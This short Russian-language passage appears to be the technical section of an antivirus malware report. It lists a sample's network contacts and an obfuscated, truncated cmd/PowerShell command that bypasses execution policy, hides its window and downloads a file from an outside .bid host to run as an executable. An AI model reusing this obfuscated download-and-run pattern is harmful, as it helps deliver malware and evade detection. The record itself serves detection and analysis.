Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^Wer^Sh^E^lL^.^EX^E -^e^Xe^Cu^t^iONpolI^cy^ bYpass -NoPRO^fI^L^E ^-^W^iNDO^Ws^tYLe ^H^I^Dden (n^e^w-OBjeCt^ ^SYStEm^.N^et.Web^CLI^E^n^T)^.dOW^N^lo^aD^F^iLE^(^'http:...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "Po^Wer^Sh^E^lL^.^EX^E -^e^Xe^Cu^t^iONpolI^cy^ bYpass -NoPRO^fI^L^E ^-^W^iNDO^Ws^tYLe ^H^I^Dden (n^e^w-OBjeCt^ ^SYStEm^.N^et.Web^CLI^E^n^T)^.dOW^N^lo^aD^F^iLE^(^'http:...' (со скрытым окном)